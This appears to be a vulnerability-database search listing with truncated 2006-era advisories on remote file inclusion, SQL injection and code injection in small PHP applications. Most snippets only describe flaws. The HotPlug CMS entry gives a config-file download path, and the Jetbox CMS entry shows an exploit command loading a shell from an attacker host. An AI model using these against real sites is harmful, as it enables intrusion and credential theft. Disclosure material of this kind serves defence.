Phpjobscheduler 3.0 (installed_config_file) File Include Vulnerabilities

No description provided by source. ====================================================================== Phpjobscheduler 3.0 - Multiple Remote File Include by Firewall Application Affect: phpjobscheduler 3.0 Source Code: http://scripts.ringsworld.com/development-tools/phpjobscheduler.v3.0.zip...

easy notes manager sql injection and authentication bypass

easy notes manager eNM version 0.0.1, available at http://217.172.179.216/evandor/html/index.php?id=103 is affected by multiple sql injection vulnerability due to a missing check of the user supplied input. An attacker can bypass the authentication procedure and get a full dump of the database...

PHP Top webs (config.php) Remote File Inclue Vulnerability

===================================================================== PHP Top webs config.php Remote File Inclue Vulnerability ===================================================================== Author : Le CoPrA ===================================================================== Download...

HotPlug CMS Config File Include Vulnerability

Hello HotPlug CMS Config File Include Vulnerability Discovered by : HACKERS PAL Copyrights : HACKERS PAL Website : WwW.SoQoR.NeT Email : [email protected] After Script Url Add includes/class/config.inc And you will download the config file ,, so that you will be able to connect by remote connect...

cwfm091.txt

+-------------------------------------------------------------------- + + Cwfm-0.9.1 Language Remote File Inclusion + + Original advisory: + + http://www.bb-pcsecurity.de/Websecurity/301/org/Cwfm-0.9.1LanguageRemoteFileInclusion.htm +...

tsep0942.txt

+-------------------------------------------------------------------- + + TSEP 0.9.4.2 + +-------------------------------------------------------------------- + + Affected Software .: TSEP 0.9.4.2 + Venedor ...........: http://www.tsep.info/ + Class .............: Remote File Inclusion + Risk...

Cwfm 0.9.1 - 'Language' Remote File Inclusion

+-------------------------------------------------------------------- + + Cwfm-0.9.1 Language Remote File Inclusion + + Original advisory: + + http://www.bb-pcsecurity.de/Websecurity/301/org/Cwfm-0.9.1LanguageRemoteFileInclusion.htm +...

ME Download System 1.3 - header.php Remote File Inclusion

ME Download System 1.3 - header.php Remote File Inclusion +-------------------------------------------------------------------- + + ME Download System 1.3 Remote File Inclusion + +-------------------------------------------------------------------- + + Affected Software .: ME Download System 1.3 ...

TSEP 0.942 - 'copyright.php' Remote File Inclusion

+-------------------------------------------------------------------- + + TSEP 0.9.4.2 + +-------------------------------------------------------------------- + + Affected Software .: TSEP 0.9.4.2 + Venedor ...........: http://www.tsep.info/ + Class .............: Remote File Inclusion + Risk...

TSEP <= 0.942 (copyright.php) Remote Inclusion Vulnerability

Exploit for unknown platform in category web applications ============================================================ TSEP + ..... + +-------------------------------------------------------------------- + + $tsepconfig"absPath" is not properly sanitized before being used +...

[email protected]

The following is the updated version of a post sent to FD http://seclists.org/lists/fulldisclosure/2006/Jul/0137.html ... Title: Unauthenticated access to BT Voyager config file and PPP credentials embedded in HTML form Successfully tested against: - BT Voyager 2091 Wireless ADSL - Firmware...

CVE-2006-2427

freshclam in 1 Clam Antivirus ClamAV 0.88 and 2 ClamXav 1.0.3h and earlier does not drop privileges before processing the config-file command line option, which allows local users to read portions of arbitrary files when an error message displays the first line of the target file...

PT-2006-3356 · Popphoto · Popphoto Studio

Name of the Vulnerable Software and Affected Versions: PopPhoto Studio versions 3.5.4 and earlier Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the include path parameter, specifically through the cfg'popphoto base path' variable in the...

Jetbox CMS 2.1 - relative_script_path Remote File Inclusion

Jetbox CMS 2.1 - relativescriptpath Remote File Inclusion !/usr/bin/perl JetBox CMS Remote File Include Exploit & Advisorie: beford uso: perl own.pl perl own.pl http://host.com/jet/ http://atacante/shell.gif cmd cmd shell example: cmd variable: cmd; Description Vendor: http://jetbox.streamedge.co...

[eVuln] QLnews XSS and PHP Code Insertion Vulnerabilities

New eVuln Advisory: QLnews XSS and PHP Code Insertion Vulnerabilities http://evuln.com/vulns/113/summary.html --------------------Summary---------------- eVuln ID: EV0113 CVE: CVE-2006-1575 CVE-2006-1576 Software: QLnews Sowtware's Web Site: http://www.vscripts.pl/ Versions: 1.2 Critical Level:...

Code injection

Direct static code injection vulnerability in ticker.db.php in Chucky A. Ivey N.T. 1.1.0 allows remote administrators to insert arbitrary PHP code into the config file, which is included other N.T. scripts...

CVE-2006-1658

Direct static code injection vulnerability in ticker.db.php in Chucky A. Ivey N.T. 1.1.0 allows remote administrators to insert arbitrary PHP code into the config file, which is included other N.T. scripts...

CVE-2006-1658

Direct static code injection vulnerability in ticker.db.php in Chucky A. Ivey N.T. 1.1.0 allows remote administrators to insert arbitrary PHP code into the config file, which is included other N.T. scripts...

CVE-2006-1563

Direct static code injection vulnerability in config.php in vscripts aka Kuba Kunkiewicz VBook aka VBook 2.0 allows remote administrators to execute arbitrary PHP code into the config file, which is included other VBook scripts...

Code injection

Direct static code injection vulnerability in config.php in vscripts aka Kuba Kunkiewicz VBook aka VBook 2.0 allows remote administrators to execute arbitrary PHP code into the config file, which is included other VBook scripts...